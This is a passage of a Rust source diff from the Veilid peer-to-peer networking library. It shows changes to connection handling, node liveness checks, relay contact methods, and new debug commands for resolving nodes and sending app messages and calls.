||||
{
|
||||
let mut error_response = ErrorResponse::new(None);
|
||||
*error_response.status_mut() = StatusCode::NOT_FOUND;
|
||||
return Err(error_response);
|
||||
}
|
||||
Ok(response)
|
||||
}
|
||||
}
|
||||
|
||||
impl ProtocolAcceptHandler for WebsocketProtocolHandler {
|
||||
fn on_accept(
|
||||
&self,
|
||||
|
@ -94,6 +94,7 @@ pub struct NetworkConnection {
|
||||
stats: Arc<Mutex<NetworkConnectionStats>>,
|
||||
sender: flume::Sender<(Option<Id>, Vec<u8>)>,
|
||||
stop_source: Option<StopSource>,
|
||||
protected: bool,
|
||||
}
|
||||
|
||||
impl NetworkConnection {
|
||||
@ -112,6 +113,7 @@ impl NetworkConnection {
|
||||
})),
|
||||
sender,
|
||||
stop_source: None,
|
||||
protected: false,
|
||||
}
|
||||
}
|
||||
|
||||
@ -157,6 +159,7 @@ impl NetworkConnection {
|
||||
stats,
|
||||
sender,
|
||||
stop_source: Some(stop_source),
|
||||
protected: false,
|
||||
}
|
||||
}
|
||||
|
||||
@ -172,6 +175,14 @@ impl NetworkConnection {
|
||||
ConnectionHandle::new(self.connection_id, self.descriptor.clone(), self.sender.clone())
|
||||
}
|
||||
|
||||
pub fn is_protected(&self) -> bool {
|
||||
self.protected
|
||||
}
|
||||
|
||||
pub fn protect(&mut self) {
|
||||
self.protected = true;
|
||||
}
|
||||
|
||||
pub fn close(&mut self) {
|
||||
if let Some(stop_source) = self.stop_source.take() {
|
||||
// drop the stopper
|
||||
@ -391,6 +402,17 @@ impl NetworkConnection {
|
||||
.await;
|
||||
}.instrument(trace_span!("process_connection")))
|
||||
}
|
||||
|
||||
pub fn debug_print(&self, cur_ts: Timestamp) -> String {
|
||||
format!("{} <- {} | {} | est {} sent {} rcvd {}",
|
||||
self.descriptor.remote_address(),
|
||||
self.descriptor.local().map(|x| x.to_string()).unwrap_or("---".to_owned()),
|
||||
self.connection_id.as_u64(),
|
||||
debug_duration(cur_ts.as_u64().saturating_sub(self.established_time.as_u64())),
|
||||
self.stats().last_message_sent_time.map(|ts| debug_duration(cur_ts.as_u64().saturating_sub(ts.as_u64())) ).unwrap_or("---".to_owned()),
|
||||
self.stats().last_message_recv_time.map(|ts| debug_duration(cur_ts.as_u64().saturating_sub(ts.as_u64())) ).unwrap_or("---".to_owned()),
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
// Resolves ready when the connection loop has terminated
|
||||
|
@ -18,6 +18,36 @@ impl NetworkManager {
|
||||
let this = self.clone();
|
||||
Box::pin(
|
||||
async move {
|
||||
|
||||
// First try to send data to the last socket we've seen this peer on
|
||||
let data = if let Some(connection_descriptor) = destination_node_ref.last_connection() {
|
||||
match this
|
||||
.net()
|
||||
.send_data_to_existing_connection(connection_descriptor, data)
|
||||
.await?
|
||||
{
|
||||
None => {
|
||||
// Update timestamp for this last connection since we just sent to it
|
||||
destination_node_ref
|
||||
.set_last_connection(connection_descriptor, get_aligned_timestamp());
|
||||
|
||||
return Ok(NetworkResult::value(SendDataKind::Existing(
|
||||
connection_descriptor,
|
||||
)));
|
||||
}
|
||||
Some(data) => {
|
||||
// Couldn't send data to existing connection
|
||||
// so pass the data back out
|
||||
data
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// No last connection
|
||||
data
|
||||
};
|
||||
|
||||
// No existing connection was found or usable, so we proceed to see how to make a new one
|
||||
|
||||
// Get the best way to contact this node
|
||||
let contact_method = this.get_node_contact_method(destination_node_ref.clone())?;
|
||||
|
||||
|
@ -649,9 +649,10 @@ impl BucketEntryInner {
|
||||
return false;
|
||||
}
|
||||
|
||||
// if we have seen the node consistently for longer that UNRELIABLE_PING_SPAN_SECS
|
||||
match self.peer_stats.rpc_stats.first_consecutive_seen_ts {
|
||||
// If we have not seen seen a node consecutively, it can't be reliable
|
||||
None => false,
|
||||
// If we have seen the node consistently for longer than UNRELIABLE_PING_SPAN_SECS then it is reliable
|
||||
Some(ts) => {
|
||||
cur_ts.saturating_sub(ts) >= TimestampDuration::new(UNRELIABLE_PING_SPAN_SECS as u64 * 1000000u64)
|
||||
}
|
||||
@ -662,11 +663,13 @@ impl BucketEntryInner {
|
||||
if self.peer_stats.rpc_stats.failed_to_send >= NEVER_REACHED_PING_COUNT {
|
||||
return true;
|
||||
}
|
||||
// if we have not heard from the node at all for the duration of the unreliable ping span
|
||||
// a node is not dead if we haven't heard from it yet,
|
||||
// but we give it NEVER_REACHED_PING_COUNT chances to ping before we say it's dead
|
||||
|
||||
match self.peer_stats.rpc_stats.last_seen_ts {
|
||||
None => self.peer_stats.rpc_stats.recent_lost_answers < NEVER_REACHED_PING_COUNT,
|
||||
// a node is not dead if we haven't heard from it yet,
|
||||
// but we give it NEVER_REACHED_PING_COUNT chances to ping before we say it's dead
|
||||
None => self.peer_stats.rpc_stats.recent_lost_answers >= NEVER_REACHED_PING_COUNT,
|
||||
|
||||
// return dead if we have not heard from the node at all for the duration of the unreliable ping span
|
||||
Some(ts) => {
|
||||
cur_ts.saturating_sub(ts) >= TimestampDuration::new(UNRELIABLE_PING_SPAN_SECS as u64 * 1000000u64)
|
||||
}
|
||||
|
@ -73,6 +73,7 @@ impl RoutingTable {
|
||||
" Self Transfer Stats: {:#?}\n\n",
|
||||
inner.self_transfer_stats
|
||||
);
|
||||
out += &format!(" Version: {}\n\n", veilid_version_string());
|
||||
|
||||
out
|
||||
}
|
||||
|
@ -244,7 +244,7 @@ pub trait NodeRefBase: Sized {
|
||||
})
|
||||
}
|
||||
|
||||
fn all_filtered_dial_info_details<F>(&self) -> Vec<DialInfoDetail> {
|
||||
fn all_filtered_dial_info_details(&self) -> Vec<DialInfoDetail> {
|
||||
let routing_domain_set = self.routing_domain_set();
|
||||
let dial_info_filter = self.dial_info_filter();
|
||||
|
||||
|
@ -470,7 +470,7 @@ impl RoutingDomainDetail for PublicInternetRoutingDomainDetail {
|
||||
return ContactMethod::Unreachable;
|
||||
};
|
||||
|
||||
// Can we reach the full relay?
|
||||
// Can we reach the inbound relay?
|
||||
if first_filtered_dial_info_detail_between_nodes(
|
||||
node_a,
|
||||
&node_b_relay,
|
||||
@ -480,11 +480,30 @@ impl RoutingDomainDetail for PublicInternetRoutingDomainDetail {
|
||||
)
|
||||
.is_some()
|
||||
{
|
||||
///////// Reverse connection
|
||||
|
||||
// Get the best match dial info for an reverse inbound connection from node B to node A
|
||||
if let Some(reverse_did) = first_filtered_dial_info_detail_between_nodes(
|
||||
node_b,
|
||||
node_a,
|
||||
&dial_info_filter,
|
||||
sequencing,
|
||||
dif_sort.clone()
|
||||
) {
|
||||
// Can we receive a direct reverse connection?
|
||||
if !reverse_did.class.requires_signal() {
|
||||
return ContactMethod::SignalReverse(
|
||||
node_b_relay_id,
|
||||
node_b_id,
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
return ContactMethod::InboundRelay(node_b_relay_id);
|
||||
}
|
||||
}
|
||||
|
||||
// If node A can't reach the node by other means, it may need to use its own relay
|
||||
// If node A can't reach the node by other means, it may need to use its outbound relay
|
||||
if peer_a.signed_node_info().node_info().network_class().outbound_wants_relay() {
|
||||
if let Some(node_a_relay_id) = peer_a.signed_node_info().relay_ids().get(best_ck) {
|
||||
// Ensure it's not our relay we're trying to reach
|
||||
|
@ -1,7 +1,7 @@
|
||||
use super::*;
|
||||
use weak_table::PtrWeakHashSet;
|
||||
|
||||
const RECENT_PEERS_TABLE_SIZE: usize = 64;
|
||||
pub const RECENT_PEERS_TABLE_SIZE: usize = 64;
|
||||
|
||||
pub type EntryCounts = BTreeMap<(RoutingDomain, CryptoKind), usize>;
|
||||
//////////////////////////////////////////////////////////////////////////
|
||||
|
@ -32,8 +32,13 @@ pub fn decode_dial_info(reader: &veilid_capnp::dial_info::Reader) -> Result<Dial
|
||||
let request = ws
|
||||
.get_request()
|
||||
.map_err(RPCError::map_protocol("missing WS request"))?;
|
||||
DialInfo::try_ws(socket_address, request.to_owned())
|
||||
.map_err(RPCError::map_protocol("invalid WS dial info"))
|
||||
DialInfo::try_ws(
|
||||
socket_address,
|
||||
request
|
||||
.to_string()
|
||||
.map_err(RPCError::map_protocol("invalid WS request string"))?,
|
||||
)
|
||||
.map_err(RPCError::map_protocol("invalid WS dial info"))
|
||||
}
|
||||
veilid_capnp::dial_info::Which::Wss(wss) => {
|
||||
let wss = wss.map_err(RPCError::protocol)?;
|
||||
@ -44,8 +49,13 @@ pub fn decode_dial_info(reader: &veilid_capnp::dial_info::Reader) -> Result<Dial
|
||||
let request = wss
|
||||
.get_request()
|
||||
.map_err(RPCError::map_protocol("missing WSS request"))?;
|
||||
DialInfo::try_wss(socket_address, request.to_owned())
|
||||
.map_err(RPCError::map_protocol("invalid WSS dial info"))
|
||||
DialInfo::try_wss(
|
||||
socket_address,
|
||||
request
|
||||
.to_string()
|
||||
.map_err(RPCError::map_protocol("invalid WSS request string"))?,
|
||||
)
|
||||
.map_err(RPCError::map_protocol("invalid WSS dial info"))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -434,6 +434,11 @@ impl RPCProcessor {
|
||||
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
|
||||
/// Get waiting app call id for debugging purposes
|
||||
pub fn get_app_call_ids(&self) -> Vec<OperationId> {
|
||||
self.unlocked_inner.waiting_app_call_table.get_operation_ids()
|
||||
}
|
||||
|
||||
/// Determine if a SignedNodeInfo can be placed into the specified routing domain
|
||||
fn verify_node_info(
|
||||
&self,
|
||||
@ -448,9 +453,9 @@ impl RPCProcessor {
|
||||
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
|
||||
/// Search the DHT for a single node closest to a key and add it to the routing table and return the node reference
|
||||
/// Search the network for a single node and add it to the routing table and return the node reference
|
||||
/// If no node was found in the timeout, this returns None
|
||||
async fn search_dht_single_key(
|
||||
async fn search_for_node_id(
|
||||
&self,
|
||||
node_id: TypedKey,
|
||||
count: usize,
|
||||
@ -486,14 +491,20 @@ impl RPCProcessor {
|
||||
};
|
||||
|
||||
// Routine to call to check if we're done at each step
|
||||
let check_done = |closest_nodes: &[NodeRef]| {
|
||||
// If the node we want to locate is one of the closest nodes, return it immediately
|
||||
if let Some(out) = closest_nodes
|
||||
.iter()
|
||||
.find(|x| x.node_ids().contains(&node_id))
|
||||
{
|
||||
return Some(out.clone());
|
||||
let check_done = |_:&[NodeRef]| {
|
||||
let Ok(Some(nr)) = routing_table
|
||||
.lookup_node_ref(node_id) else {
|
||||
return None;
|
||||
};
|
||||
|
||||
// ensure we have some dial info for the entry already,
|
||||
// and that the node is still alive
|
||||
// if not, we should keep looking for better info
|
||||
if !matches!(nr.state(get_aligned_timestamp()),BucketEntryState::Dead) &&
|
||||
nr.has_any_dial_info() {
|
||||
return Some(nr);
|
||||
}
|
||||
|
||||
None
|
||||
};
|
||||
|
||||
@ -529,8 +540,10 @@ impl RPCProcessor {
|
||||
.map_err(RPCError::internal)?
|
||||
{
|
||||
// ensure we have some dial info for the entry already,
|
||||
// and that the node is still alive
|
||||
// if not, we should do the find_node anyway
|
||||
if nr.has_any_dial_info() {
|
||||
if !matches!(nr.state(get_aligned_timestamp()),BucketEntryState::Dead) &&
|
||||
nr.has_any_dial_info() {
|
||||
return Ok(Some(nr));
|
||||
}
|
||||
}
|
||||
@ -548,7 +561,7 @@ impl RPCProcessor {
|
||||
|
||||
// Search in preferred cryptosystem order
|
||||
let nr = match this
|
||||
.search_dht_single_key(node_id, node_count, fanout, timeout, safety_selection)
|
||||
.search_for_node_id(node_id, node_count, fanout, timeout, safety_selection)
|
||||
.await
|
||||
{
|
||||
TimeoutOr::Timeout => None,
|
||||
@ -558,13 +571,6 @@ impl RPCProcessor {
|
||||
}
|
||||
};
|
||||
|
||||
if let Some(nr) = &nr {
|
||||
if nr.node_ids().contains(&node_id) {
|
||||
// found a close node, but not exact within our configured resolve_node timeout
|
||||
return Ok(None);
|
||||
}
|
||||
}
|
||||
|
||||
Ok(nr)
|
||||
})
|
||||
}
|
||||
|
@ -30,6 +30,7 @@ where
|
||||
C: Unpin + Clone,
|
||||
{
|
||||
context: C,
|
||||
timestamp: Timestamp,
|
||||
eventual: EventualValue<(Option<Id>, T)>,
|
||||
}
|
||||
|
||||
@ -82,6 +83,7 @@ where
|
||||
let e = EventualValue::new();
|
||||
let waiting_op = OperationWaitingOp {
|
||||
context,
|
||||
timestamp: get_aligned_timestamp(),
|
||||
eventual: e.clone(),
|
||||
};
|
||||
if inner.waiting_op_table.insert(op_id, waiting_op).is_some() {
|
||||
@ -98,6 +100,18 @@ where
|
||||
}
|
||||
}
|
||||
|
||||
/// Get all waiting operation ids
|
||||
pub fn get_operation_ids(&self) -> Vec<OperationId> {
|
||||
let inner = self.inner.lock();
|
||||
let mut opids: Vec<(OperationId, Timestamp)> = inner
|
||||
.waiting_op_table
|
||||
.iter()
|
||||
.map(|x| (*x.0, x.1.timestamp))
|
||||
.collect();
|
||||
opids.sort_by(|a, b| a.1.cmp(&b.1));
|
||||
opids.into_iter().map(|x| x.0).collect()
|
||||
}
|
||||
|
||||
/// Get operation context
|
||||
pub fn get_op_context(&self, op_id: OperationId) -> Result<C, RPCError> {
|
||||
let inner = self.inner.lock();
|
||||
|
@ -15,6 +15,35 @@ static DEBUG_CACHE: Mutex<DebugCache> = Mutex::new(DebugCache {
|
||||
imported_routes: Vec::new(),
|
||||
});
|
||||
|
||||
fn format_opt_ts(ts: Option<TimestampDuration>) -> String {
|
||||
let Some(ts) = ts else {
|
||||
return "---".to_owned();
|
||||
};
|
||||
let ts = ts.as_u64();
|
||||
let secs = timestamp_to_secs(ts);
|
||||
if secs >= 1.0 {
|
||||
format!("{:.2}s", timestamp_to_secs(ts))
|
||||
} else {
|
||||
format!("{:.2}ms", timestamp_to_secs(ts) * 1000.0)
|
||||
}
|
||||
}
|
||||
|
||||
fn format_opt_bps(bps: Option<ByteCount>) -> String {
|
||||
let Some(bps) = bps else {
|
||||
return "---".to_owned();
|
||||
};
|
||||
let bps = bps.as_u64();
|
||||
if bps >= 1024u64 * 1024u64 * 1024u64 {
|
||||
format!("{:.2}GB/s", (bps / (1024u64 * 1024u64)) as f64 / 1024.0)
|
||||
} else if bps >= 1024u64 * 1024u64 {
|
||||
format!("{:.2}MB/s", (bps / 1024u64) as f64 / 1024.0)
|
||||
} else if bps >= 1024u64 {
|
||||
format!("{:.2}KB/s", bps as f64 / 1024.0)
|
||||
} else {
|
||||
format!("{:.2}B/s", bps as f64)
|
||||
}
|
||||
}
|
||||
|
||||
fn get_bucket_entry_state(text: &str) -> Option<BucketEntryState> {
|
||||
if text == "dead" {
|
||||
Some(BucketEntryState::Dead)
|
||||
@ -165,82 +194,89 @@ fn get_node_ref_modifiers(mut node_ref: NodeRef) -> impl FnOnce(&str) -> Option<
|
||||
}
|
||||
}
|
||||
|
||||
fn get_destination(routing_table: RoutingTable) -> impl FnOnce(&str) -> Option<Destination> {
|
||||
fn get_destination(
|
||||
routing_table: RoutingTable,
|
||||
) -> impl FnOnce(&str) -> SendPinBoxFuture<Option<Destination>> {
|
||||
move |text| {
|
||||
// Safety selection
|
||||
let (text, ss) = if let Some((first, second)) = text.split_once('+') {
|
||||
let ss = get_safety_selection(routing_table.clone())(second)?;
|
||||
(first, Some(ss))
|
||||
} else {
|
||||
(text, None)
|
||||
};
|
||||
if text.len() == 0 {
|
||||
return None;
|
||||
}
|
||||
if &text[0..1] == "#" {
|
||||
let rss = routing_table.route_spec_store();
|
||||
let text = text.to_owned();
|
||||
Box::pin(async move {
|
||||
// Safety selection
|
||||
let (text, ss) = if let Some((first, second)) = text.split_once('+') {
|
||||
let ss = get_safety_selection(routing_table.clone())(second)?;
|
||||
(first, Some(ss))
|
||||
} else {
|
||||
(text.as_str(), None)
|
||||
};
|
||||
if text.len() == 0 {
|
||||
return None;
|
||||
}
|
||||
if &text[0..1] == "#" {
|
||||
let rss = routing_table.route_spec_store();
|
||||
|
||||
// Private route
|
||||
let text = &text[1..];
|
||||
// Private route
|
||||
let text = &text[1..];
|
||||
|
||||
let private_route = if let Some(prid) = get_route_id(rss.clone(), false, true)(text) {
|
||||
let Some(private_route) = rss.best_remote_private_route(&prid) else {
|
||||
let private_route = if let Some(prid) = get_route_id(rss.clone(), false, true)(text)
|
||||
{
|
||||
let Some(private_route) = rss.best_remote_private_route(&prid) else {
|
||||
return None;
|
||||
};
|
||||
private_route
|
||||
} else {
|
||||
let mut dc = DEBUG_CACHE.lock();
|
||||
let n = get_number(text)?;
|
||||
let prid = dc.imported_routes.get(n)?.clone();
|
||||
let Some(private_route) = rss.best_remote_private_route(&prid) else {
|
||||
private_route
|
||||
} else {
|
||||
let mut dc = DEBUG_CACHE.lock();
|
||||
let n = get_number(text)?;
|
||||
let prid = dc.imported_routes.get(n)?.clone();
|
||||
let Some(private_route) = rss.best_remote_private_route(&prid) else {
|
||||
// Remove imported route
|
||||
dc.imported_routes.remove(n);
|
||||
info!("removed dead imported route {}", n);
|
||||
return None;
|
||||
};
|
||||
private_route
|
||||
};
|
||||
private_route
|
||||
};
|
||||
|
||||
Some(Destination::private_route(
|
||||
private_route,
|
||||
ss.unwrap_or(SafetySelection::Unsafe(Sequencing::default())),
|
||||
))
|
||||
} else {
|
||||
let (text, mods) = text
|
||||
.split_once('/')
|
||||
.map(|x| (x.0, Some(x.1)))
|
||||
.unwrap_or((text, None));
|
||||
if let Some((first, second)) = text.split_once('@') {
|
||||
// Relay
|
||||
let mut relay_nr = get_node_ref(routing_table.clone())(second)?;
|
||||
let target_nr = get_node_ref(routing_table)(first)?;
|
||||
|
||||
if let Some(mods) = mods {
|
||||
relay_nr = get_node_ref_modifiers(relay_nr)(mods)?;
|
||||
}
|
||||
|
||||
let mut d = Destination::relay(relay_nr, target_nr);
|
||||
if let Some(ss) = ss {
|
||||
d = d.with_safety(ss)
|
||||
}
|
||||
|
||||
Some(d)
|
||||
Some(Destination::private_route(
|
||||
private_route,
|
||||
ss.unwrap_or(SafetySelection::Unsafe(Sequencing::default())),
|
||||
))
|
||||
} else {
|
||||
// Direct
|
||||
let mut target_nr = get_node_ref(routing_table)(text)?;
|
||||
let (text, mods) = text
|
||||
.split_once('/')
|
||||
.map(|x| (x.0, Some(x.1)))
|
||||
.unwrap_or((text, None));
|
||||
if let Some((first, second)) = text.split_once('@') {
|
||||
// Relay
|
||||
let mut relay_nr = get_node_ref(routing_table.clone())(second)?;
|
||||
let target_nr = get_node_ref(routing_table)(first)?;
|
||||
|
||||
if let Some(mods) = mods {
|
||||
target_nr = get_node_ref_modifiers(target_nr)(mods)?;
|
||||
if let Some(mods) = mods {
|
||||
relay_nr = get_node_ref_modifiers(relay_nr)(mods)?;
|
||||
}
|
||||
|
||||
let mut d = Destination::relay(relay_nr, target_nr);
|
||||
if let Some(ss) = ss {
|
||||
d = d.with_safety(ss)
|
||||
}
|
||||
|
||||
Some(d)
|
||||
} else {
|
||||
// Direct
|
||||
let mut target_nr =
|
||||
resolve_node_ref(routing_table, ss.unwrap_or_default())(text).await?;
|
||||
|
||||
if let Some(mods) = mods {
|
||||
target_nr = get_node_ref_modifiers(target_nr)(mods)?;
|
||||
}
|
||||
|
||||
let mut d = Destination::direct(target_nr);
|
||||
if let Some(ss) = ss {
|
||||
d = d.with_safety(ss)
|
||||
}
|
||||
|
||||
Some(d)
|
||||
}
|
||||
|
||||
let mut d = Destination::direct(target_nr);
|
||||
if let Some(ss) = ss {
|
||||
d = d.with_safety(ss)
|
||||
}
|
||||
|
||||
Some(d)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
@ -292,6 +328,44 @@ fn get_dht_key(
|
||||
}
|
||||
}
|
||||
|
||||
fn resolve_node_ref(
|
||||
routing_table: RoutingTable,
|
||||
safety_selection: SafetySelection,
|
||||
) -> impl FnOnce(&str) -> SendPinBoxFuture<Option<NodeRef>> {
|
||||
move |text| {
|
||||
let text = text.to_owned();
|
||||
Box::pin(async move {
|
||||
let (text, mods) = text
|
||||
.split_once('/')
|
||||
.map(|x| (x.0, Some(x.1)))
|
||||
.unwrap_or((&text, None));
|
||||
|
||||
let mut nr = if let Some(key) = get_public_key(text) {
|
||||
let node_id = TypedKey::new(best_crypto_kind(), key);
|
||||
routing_table
|
||||
.rpc_processor()
|
||||
.resolve_node(node_id, safety_selection)
|
||||
.await
|
||||
.ok()
|
||||
.flatten()?
|
||||
} else if let Some(node_id) = get_typed_key(text) {
|
||||
routing_table
|
||||
.rpc_processor()
|
||||
.resolve_node(node_id, safety_selection)
|
||||
.await
|
||||
.ok()
|
||||
.flatten()?
|
||||
} else {
|
||||
return None;
|
||||
};
|
||||
if let Some(mods) = mods {
|
||||
nr = get_node_ref_modifiers(nr)(mods)?;
|
||||
}
|
||||
Some(nr)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
fn get_node_ref(routing_table: RoutingTable) -> impl FnOnce(&str) -> Option<NodeRef> {
|
||||
move |text| {
|
||||
let (text, mods) = text
|
||||
@ -301,8 +375,8 @@ fn get_node_ref(routing_table: RoutingTable) -> impl FnOnce(&str) -> Option<Node
|
||||
|
||||
let mut nr = if let Some(key) = get_public_key(text) {
|
||||
routing_table.lookup_any_node_ref(key).ok().flatten()?
|
||||
} else if let Some(key) = get_typed_key(text) {
|
||||
routing_table.lookup_node_ref(key).ok().flatten()?
|
||||
} else if let Some(node_id) = get_typed_key(text) {
|
||||
routing_table.lookup_node_ref(node_id).ok().flatten()?
|
||||
} else {
|
||||
return None;
|
||||
};
|
||||
@ -394,6 +468,19 @@ fn get_debug_argument<T, G: FnOnce(&str) -> Option<T>>(
|
||||
};
|
||||
Ok(val)
|
||||
}
|
||||
|
||||
async fn async_get_debug_argument<T, G: FnOnce(&str) -> SendPinBoxFuture<Option<T>>>(
|
||||
value: &str,
|
||||
context: &str,
|
||||
argument: &str,
|
||||
getter: G,
|
||||
) -> VeilidAPIResult<T> {
|
||||
let Some(val) = getter(value).await else {
|
||||
apibail_invalid_argument!(context, argument, value);
|
||||
};
|
||||
Ok(val)
|
||||
}
|
||||
|
||||
fn get_debug_argument_at<T, G: FnOnce(&str) -> Option<T>>(
|
||||
debug_args: &[String],
|
||||
pos: usize,
|
||||
@ -411,6 +498,23 @@ fn get_debug_argument_at<T, G: FnOnce(&str) -> Option<T>>(
|
||||
Ok(val)
|
||||
}
|
||||
|
||||
async fn async_get_debug_argument_at<T, G: FnOnce(&str) -> SendPinBoxFuture<Option<T>>>(
|
||||
debug_args: &[String],
|
||||
pos: usize,
|
||||
context: &str,
|
||||
argument: &str,
|
||||
getter: G,
|
||||
) -> VeilidAPIResult<T> {
|
||||
if pos >= debug_args.len() {
|
||||
apibail_missing_argument!(context, argument);
|
||||
}
|
||||
let value = &debug_args[pos];
|
||||
let Some(val) = getter(value).await else {
|
||||
apibail_invalid_argument!(context, argument, value);
|
||||
};
|
||||
Ok(val)
|
||||
}
|
||||
|
||||
pub fn print_data(data: &[u8], truncate_len: Option<usize>) -> String {
|
||||
// check is message body is ascii printable
|
||||
let mut printable = true;
|
||||
@ -578,7 +682,32 @@ impl VeilidAPI {
|
||||
async fn debug_nodeinfo(&self, _args: String) -> VeilidAPIResult<String> {
|
||||
// Dump routing table entry
|
||||
let routing_table = self.network_manager()?.routing_table();
|
||||
Ok(routing_table.debug_info_nodeinfo())
|
||||
let connection_manager = self.network_manager()?.connection_manager();
|
||||
let nodeinfo = routing_table.debug_info_nodeinfo();
|
||||
|
||||
// Dump core state
|
||||
let state = self.get_state().await?;
|
||||
|
||||
let mut peertable = format!(
|
||||
"Recent Peers: {} (max {})\n",
|
||||
state.network.peers.len(),
|
||||
RECENT_PEERS_TABLE_SIZE
|
||||
);
|
||||
for peer in state.network.peers {
|
||||
peertable += &format!(
|
||||
" {} | {} | {} | {} down | {} up\n",
|
||||
peer.node_ids.first().unwrap(),
|
||||
peer.peer_address,
|
||||
format_opt_ts(peer.peer_stats.latency.map(|l| l.average)),
|
||||
format_opt_bps(Some(peer.peer_stats.transfer.down.average)),
|
||||
format_opt_bps(Some(peer.peer_stats.transfer.up.average)),
|
||||
);
|
||||
}
|
||||
|
||||
// Dump connection table
|
||||
let connman = connection_manager.debug_print().await;
|
||||
|
||||
Ok(format!("{}\n\n{}\n\n{}\n\n", nodeinfo, peertable, connman))
|
||||
}
|
||||
|
||||
async fn debug_config(&self, args: String) -> VeilidAPIResult<String> {
|
||||
@ -742,6 +871,47 @@ impl VeilidAPI {
|
||||
Ok(format!("{:#?}", cm))
|
||||
}
|
||||
|
||||
async fn debug_resolve(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let routing_table = netman.routing_table();
|
||||
|
||||
let args: Vec<String> = args.split_whitespace().map(|s| s.to_owned()).collect();
|
||||
|
||||
let dest = async_get_debug_argument_at(
|
||||
&args,
|
||||
0,
|
||||
"debug_resolve",
|
||||
"destination",
|
||||
get_destination(routing_table.clone()),
|
||||
)
|
||||
.await?;
|
||||
|
||||
match &dest {
|
||||
Destination::Direct {
|
||||
target,
|
||||
safety_selection: _,
|
||||
} => Ok(format!(
|
||||
"Destination: {:#?}\nTarget Entry:\n{}\n",
|
||||
&dest,
|
||||
routing_table.debug_info_entry(target.clone())
|
||||
)),
|
||||
Destination::Relay {
|
||||
relay,
|
||||
target,
|
||||
safety_selection: _,
|
||||
} => Ok(format!(
|
||||
"Destination: {:#?}\nTarget Entry:\n{}\nRelay Entry:\n{}\n",
|
||||
&dest,
|
||||
routing_table.clone().debug_info_entry(target.clone()),
|
||||
routing_table.debug_info_entry(relay.clone())
|
||||
)),
|
||||
Destination::PrivateRoute {
|
||||
private_route: _,
|
||||
safety_selection: _,
|
||||
} => Ok(format!("Destination: {:#?}", &dest)),
|
||||
}
|
||||
}
|
||||
|
||||
async fn debug_ping(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let routing_table = netman.routing_table();
|
||||
@ -749,15 +919,16 @@ impl VeilidAPI {
|
||||
|
||||
let args: Vec<String> = args.split_whitespace().map(|s| s.to_owned()).collect();
|
||||
|
||||
let dest = get_debug_argument_at(
|
||||
let dest = async_get_debug_argument_at(
|
||||
&args,
|
||||
0,
|
||||
"debug_ping",
|
||||
"destination",
|
||||
get_destination(routing_table),
|
||||
)?;
|
||||
)
|
||||
.await?;
|
||||
|
||||
// Dump routing table entry
|
||||
// Send a StatusQ
|
||||
let out = match rpc
|
||||
.rpc_call_status(dest)
|
||||
.await
|
||||
@ -772,6 +943,109 @@ impl VeilidAPI {
|
||||
Ok(format!("{:#?}", out))
|
||||
}
|
||||
|
||||
async fn debug_app_message(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let routing_table = netman.routing_table();
|
||||
let rpc = netman.rpc_processor();
|
||||
|
||||
let (arg, rest) = args.split_once(' ').unwrap_or((&args, ""));
|
||||
let rest = rest.trim_start().to_owned();
|
||||
|
||||
let dest = async_get_debug_argument(
|
||||
arg,
|
||||
"debug_app_message",
|
||||
"destination",
|
||||
get_destination(routing_table),
|
||||
)
|
||||
.await?;
|
||||
|
||||
let data = get_debug_argument(&rest, "debug_app_message", "data", get_data)?;
|
||||
let data_len = data.len();
|
||||
|
||||
// Send a AppMessage
|
||||
let out = match rpc
|
||||
.rpc_call_app_message(dest, data)
|
||||
.await
|
||||
.map_err(VeilidAPIError::internal)?
|
||||
{
|
||||
NetworkResult::Value(_) => format!("Sent {} bytes", data_len),
|
||||
r => {
|
||||
return Ok(r.to_string());
|
||||
}
|
||||
};
|
||||
|
||||
Ok(out)
|
||||
}
|
||||
|
||||
async fn debug_app_call(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let routing_table = netman.routing_table();
|
||||
let rpc = netman.rpc_processor();
|
||||
|
||||
let (arg, rest) = args.split_once(' ').unwrap_or((&args, ""));
|
||||
let rest = rest.trim_start().to_owned();
|
||||
|
||||
let dest = async_get_debug_argument(
|
||||
arg,
|
||||
"debug_app_call",
|
||||
"destination",
|
||||
get_destination(routing_table),
|
||||
)
|
||||
.await?;
|
||||
|
||||
let data = get_debug_argument(&rest, "debug_app_call", "data", get_data)?;
|
||||
let data_len = data.len();
|
||||
|
||||
// Send a AppMessage
|
||||
let out = match rpc
|
||||
.rpc_call_app_call(dest, data)
|
||||
.await
|
||||
.map_err(VeilidAPIError::internal)?
|
||||
{
|
||||
NetworkResult::Value(v) => format!(
|
||||
"Sent {} bytes, received: {}",
|
||||
data_len,
|
||||
print_data(&v.answer, Some(512))
|
||||
),
|
||||
r => {
|
||||
return Ok(r.to_string());
|
||||
}
|
||||
};
|
||||
|
||||
Ok(out)
|
||||
}
|
||||
|
||||
async fn debug_app_reply(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let rpc = netman.rpc_processor();
|
||||
|
||||
let (call_id, data) = if args.starts_with("#") {
|
||||
let (arg, rest) = args[1..].split_once(' ').unwrap_or((&args, ""));
|
||||
let call_id =
|
||||
OperationId::new(u64::from_str_radix(arg, 16).map_err(VeilidAPIError::generic)?);
|
||||
let rest = rest.trim_start().to_owned();
|
||||
let data = get_debug_argument(&rest, "debug_app_reply", "data", get_data)?;
|
||||
(call_id, data)
|
||||
} else {
|
||||
let call_id = rpc
|
||||
.get_app_call_ids()
|
||||
.first()
|
||||
.cloned()
|
||||
.ok_or_else(|| VeilidAPIError::generic("no app calls waiting"))?;
|
||||
let data = get_debug_argument(&args, "debug_app_reply", "data", get_data)?;
|
||||
(call_id, data)
|
||||
};
|
||||
|
||||
let data_len = data.len();
|
||||
|
||||
// Send a AppCall Reply
|
||||
self.app_call_reply(call_id, data)
|
||||
.await
|
||||
